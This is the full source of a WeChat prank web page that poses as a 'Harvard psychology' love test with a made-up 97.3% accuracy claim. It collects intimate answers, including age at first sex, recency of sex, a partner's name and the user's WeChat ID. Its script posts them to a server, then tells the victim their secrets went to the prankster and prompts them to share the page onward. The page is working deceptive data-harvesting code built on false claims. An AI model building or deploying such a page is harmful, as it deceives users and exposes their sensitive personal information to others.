<!DOCTYPE html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Content-Type" content="text/html" charset="utf-8" />
<title>哈佛心理系博士爱情分析法</title>
<style type="text/css">
html,body,div,a,img,h1,h2,h3,h4,h5,h6,p,span{
	margin:0;
	padding:0;
}
body{
	font: 12px/1.4 Arial,"Hiragino Sans GB","Microsoft YaHei","WenQuanYi Micro Hei",sans-serif;
	background-color:#f8f8f8;
}
h1,h2,h3,h4,h5,h6{
	font-size: 100%;
	font-weight:normal;
}
img{
	border:0 none;
}
a{
	text-decoration: none;
}
.wrap{
	margin:0 auto;
	width:320px;
	height:100%;
	position:relative;
}
.hide{
	display:none;
}
.wrap .page_box{
	position:absolute;
	top:0;
	left:0;
	width:320px;
	text-align:center;
}
.page0 div{
	margin:20px 0;
}
.begin_img{
	width:295px;
	height:196px;
}
h1{
	font-size:20px;
	margin:20px 0;
	color:#F1507A;
}
.page_r p{
	font-size:16px;
	margin:5px 0;
}
.color_orange{
	font-size:16px;
	color:#F1507A;
	margin:0 3px;
}
.start_btn{
	background-color:#F1507A;
	color:#ffffff;
	border-radius:3px;
	display:inline-block;
	width:100px;
	font-size:18px;
	height:36px;
	line-height:36px;
}
.page_q{
	font-size:18px;
}
.question{
	margin:50px 0 10px;
}
.weixinnum{
	font-size:14px;
	margin:-10px 0 -5px;
}
.answer{
	border:1px solid #000;
	padding:3px;
	font-size:16px;
	margin:10px 0 40px;
	border-radius:0;
}
.result_btn,
.next_btn{
	display:block;
	background-color:#F1507A;
	color:#ffffff;
	border-radius:3px;
	width:100px;
	font-size:18px;
	height:36px;
	line-height:36px;
	margin:0 auto;
}
.avater_box{
	width:118px;
	height:118px;
	border-radius:65px;
	border:6px solid #fbfbfb;
	overflow:hidden;
	margin:30px auto;
	box-shadow:0 1px 0 rgba(255, 255, 255, 0.3) inset, 0 1px 2px rgba(0, 0, 0, 0.3);
}
.avater_box img{
	width:118px;
	height:118px;
}
.banner_wrap{
	position:absolute;
	bottom:0;
	left:0;
	width:100%;
	font-size:0;
}
.banner_wrap img{
	width:100%;
}
.banner_wrap .share_btn{
	display:block;
	float:left;
	width:50%;
	height:51px;
	text-align:center;
	font-size:18px;
	line-height:51px;
	color:#fff;
}
.banner_wrap .share_btn1{
	background-color:#F4A4B9;
}
.banner_wrap .share_btn2{
	background-color:#F27A99;
}
.blockUI{
	background-color:rgba(0,0,0,0.6);
	position:fixed;
	width:100%;
	height:100%;
	top:0;
	left:0;
}
.share_inner{
	margin:0 auto;
	width:310px;
	color:#fff;
	font-size:13px;
	position:relative;
	padding-top:65px;
}
.share_inner .big_font{
	font-size:17px;
	margin:0 2px;
}
.icon{
	background-image:url(img.png);
}
.i_share_pink{
	background-position: -113px -5px;
	width:81px;
	height:61px;
	display:inline-block;
	margin-right:70px;
}
.i_share_white{
	background-position: -5px -5px;
	width:85px;
	height:55px;
	display:block;
	position:absolute;
	top:10px;
	right:0;
}
.result1{
	position:relative;
}
.i_result_haha{
	background-position: -5px -71px;
	width:50px;
	height:24px;
	display:block;
	position:absolute;
	top:-10px;
	left:12px;
}
/* Hi-res retina display */
@media only screen and (-webkit-min-device-pixel-ratio: 2)
{
	.icon{
		background-image:url(img@2x.png);
		background-repeat:repeat-x;
		-webkit-background-size: 200px 100px;
	}
}
@media (max-height: 499px) { /* 320*480 */
	.i_share_pink{
		display:none;
	}
}
</style>
</head>

<body>
<div class="wrap">
	<div class="page_box page0 hide">
    	<h1>哈佛心理系情感分析测验</h1>
        <img class="begin_img" src="book.png" />
        <div>
            <p>哈佛心理系博士50人团队10年研究的情感测验，</p>
            <p>准确率高达<span class="color_orange">97.3%</span>。</p>
        </div>
        <div>
            <p>你将回答几个个人问题。</p>
            <p>尽量不要让你的潜意识干扰你，用直觉回答。</p>
        </div>
        <a class="start_btn" id="J_start_btn">开始测试</a>
    </div>
    <div class="page_box page_q hide">
    	<h1>哈佛心理系情感分析测验</h1>
        <p class="question">你属于什么星座？</p>
        <input class="answer" type="text" name="answer1" value="" id="J_answer1" maxlength="8" autocomplete="off" />
        <a class="next_btn">下一题></a>
    </div>
    <div class="page_box page_q hide">
    	<h1>哈佛心理系情感分析测验</h1>
        <p class="question">你心爱的人的名字是？</p>
        <input class="answer" type="text" name="answer2" value="" id="J_answer2" maxlength="8" autocomplete="off" />
        <a class="next_btn">下一题></a>
    </div>
    <div class="page_box page_q hide">
    	<h1>哈佛心理系情感分析测验</h1>
        <p class="question">你几岁时失去童贞？</p>
        <input class="answer" type="text" name="answer3" value="" id="J_answer3" maxlength="8" autocomplete="off" />
        <a class="next_btn">下一题></a>
    </div>
    <div class="page_box page_q hide">
    	<h1>哈佛心理系情感分析测验</h1>
        <p class="question">你上一次发生性行为是几天前？</p>
        <input class="answer" type="text" name="answer4" value="" id="J_answer4" maxlength="8" autocomplete="off" />
        <a class="next_btn">下一题></a>
    </div>
    <div class="page_box page_q hide">
    	<h1>哈佛心理系情感分析测验</h1>
        <p class="question">你是否容易为他（她）吃醋？</p>
        <input class="answer" type="text" name="answer5" value="" id="J_answer5" maxlength="8" autocomplete="off" />
        <a class="next_btn">下一题></a>
    </div>
    <div class="page_box page_q hide">
    	<h1>哈佛心理系情感分析测验</h1>
        <p class="question">你身边的人怎么称呼你？</p>
        <input class="answer" type="text" name="answer6" value="" id="J_answer6" maxlength="8" autocomplete="off" />
        <a class="next_btn">下一题></a>
    </div>
	<div class="page_box page_q hide">
    	<h1>哈佛心理系情感分析测验</h1>
        <p class="question">你的微信号是？</p>
		<p class="weixinnum">（解读会发到这里）</p>
        <input class="answer" type="text" name="answer6" value="" id="J_answer7" autocomplete="off" />
        <a class="result_btn">测试结果</a>
    </div>
    <div class="page_box page_r">
    	<h1>哈佛心理系情感分析测验</h1>
        <div class="result1">
			<i class="icon i_result_haha"></i>
        	<p>噗哈哈哈哈哈！你被我骗了~</p>
            <p>刚刚那些小秘密都发到我微信上了！</p>
        </div>
        <div class="avater_box">
        	<img src="avater.png" id="J_link_avatar" />
        </div>
        <p>好玩吧~戳下方按钮</p>
		<p>你也可和我一样整蛊小伙伴哦~</p>
		<i class="icon i_share_pink"></i>
    </div>
</div>
<div class="banner_wrap" id="J_banner2">
	<a class="share_btn share_btn1" id="J_share_btn">发起整蛊</a>
	<a class="share_btn share_btn2" href="http://mp.weixin.qq.com/s?__biz=MjM5MTAzNDM0Mg==&mid=200894181&idx=1&sn=3d415d6ec15a3c3a4ed7a4f16760a4b2#rd">关注[追TA]</a>
</div>
<a class="banner_wrap hide" href="http://a.app.qq.com/o/simple.jsp?pkgname=com.yunio.pickup" id="J_banner1">
	<img src="banner.png" />
</a>
<div class="blockUI share_wrap hide" id="J_share_wrap">
	<div class="share_inner">
		<i class="icon i_share_white"></i>
		<p>1、点击右上角“<span class="big_font">分享</span>”按钮</p>
		<p>2、点击【<span class="big_font">分享到朋友圈</span>】或【<span class="big_font">分享给朋友</span>】发起整蛊</p>
		<p>3、查看是否有人上当请点击<span class="big_font">个人分享</span>的页面</p>
	</div>
</div>
<script type="text/javascript" src="jquery-1.8.3.min.js"></script>
<script type="text/javascript">
var openida = window.location.href.split('openida=')[1];
openida = openida.split('&openidb=')[0];
var openidb = window.location.href.split('&openidb=')[1];
window.shareData = {
	"imgUrl": "http://203.195.222.243/wechat/share.png",//todo img url
	"timeLineLink": "http://203.195.222.243/wechat/login.php?openid="+openidb,
	"tTitle": "我做过很多测试，准到让我害怕的只有这次。。。",
	"tContent": "哈佛心理系博士五十人团队十年研究的情感测试。",
	"tContent2": "准到我怕了！哈佛心理系博士50人团队十年研究测试，准确率97.3%！",
	"callback": function(){
		document.location.href = "http://mp.weixin.qq.com/s?__biz=MjM5MTAzNDM0Mg==&mid=201005868&idx=1&sn=537ad133b5aeaf05c827f8d346a27ad5#rd";//todo callback url
	}
};
function getAinfo(){
	if(openida != '' && openida != openidb){
		$.ajax({
			type: "POST",
			url: 'userinfo.php',
			data:'openid='+openida,
			dataType:"JSON",
			success: function(data){
				if(data.headimgurl != null && data.headimgurl != ''){
					$('#J_link_avatar').attr({'src':data.headimgurl,'onerror':'avater.png'});
				}
			},
			error: function(data){
			}
		});
	}
}
function sendAnswer(){
	$.ajax({
		type: "POST",
		url: 'result.php',
		dataType:"JSON",
		data:'answer1='+encodeURIComponent( $('#J_answer1').val() ) +'&answer2='+encodeURIComponent( $('#J_answer2').val() ) + '&answer3='+encodeURIComponent( $('#J_answer3').val() ) + '&answer4='+encodeURIComponent( $('#J_answer4').val() ) + '&answer5='+encodeURIComponent( $('#J_answer5').val() ) + '&answer6='+encodeURIComponent( $('#J_answer6').val() ) + '&answer7='+encodeURIComponent( $('#J_answer7').val() ),
		success: function(data){
		},
		error: function(data){
		}
	});
}
$(document).ready(function(){
	var windowH = $(window).height(),
		windowW = $(window).width();
	$('.wrap').css({'height' : windowH + 'px'});
	$('.banner_wrap').css({'width' : windowW + 'px'});
	getAinfo();
});
if(document.getElementById('J_start_btn').ontouchstart === null){
	$('#J_start_btn').bind({
		'touchstart':function(){
			var page_now = $(this).parent('.page_box');
			var page_next = page_now.next('.page_box');
			page_now.hide();
			page_next.show();
			$('#J_banner1').hide();
		}
	});
	$('.next_btn').bind({
		'touchstart':function(){
			var page_now = $(this).parent('.page_box');
			var page_next = page_now.next('.page_box');
			page_now.hide();
			page_next.show();
		}
	});
	$('.result_btn').bind({
		'touchstart':function(){
			sendAnswer();
			var page_now = $(this).parent('.page_box');
			var page_next = page_now.next('.page_box');
			page_now.hide();
			page_next.show();
			$('#J_banner2').show();
		}
	});
	$('#J_share_btn').bind({
		'touchstart':function(){
			$('#J_share_wrap').show();
		}
	})
	$('#J_share_wrap').bind({
		'touchstart':function(){
			$('#J_share_wrap').hide();
		}
	});
}else{
	$('#J_start_btn').bind({
		'click':function(){
			var page_now = $(this).parent('.page_box');
			var page_next = page_now.next('.page_box');
			page_now.hide();
			page_next.show();
			$('#J_banner1').hide();
		}
	});
	$('.next_btn').bind({
		'click':function(){
			var page_now = $(this).parent('.page_box');
			var page_next = page_now.next('.page_box');
			page_now.hide();
			page_next.show();
		}
	});
	$('.result_btn').bind({
		'click':function(){
			sendAnswer();
			var page_now = $(this).parent('.page_box');
			var page_next = page_now.next('.page_box');
			page_now.hide();
			page_next.show();
			$('#J_banner2').show();
		}
	});
	$('#J_share_btn').bind({
		'click':function(){
			$('#J_share_wrap').show();
		}
	})
	$('#J_share_wrap').bind({
		'click':function(){
			$('#J_share_wrap').hide();
		}
	});
}

document.addEventListener('WeixinJSBridgeReady', function onBridgeReady() {
	
	WeixinJSBridge.on('menu:share:appmessage', function(argv) {
		WeixinJSBridge.invoke('sendAppMessage', {
			"img_url": window.shareData.imgUrl,
			"link": window.shareData.timeLineLink,
			"desc": window.shareData.tContent,
			"title": window.shareData.tTitle
		}, function(res) {
			window.shareData.callback();
		})
	});

	WeixinJSBridge.on('menu:share:timeline', function(argv) {
		WeixinJSBridge.invoke('shareTimeline', {
			"img_url": window.shareData.imgUrl,
			"link": window.shareData.timeLineLink,
			"desc": window.shareData.tContent2,
			"title": window.shareData.tContent2
		}, function(res) {	 
			window.shareData.callback();
		});
	});
	
	WeixinJSBridge.on('menu:share:weibo', function(argv) {
		WeixinJSBridge.invoke('shareWeibo', {
			"content": window.shareData.tContent,
			"url": window.shareData.timeLineLink
		}, function(res) {
			window.shareData.callback();
		});
	});
}, false);
</script>
</body>
</html>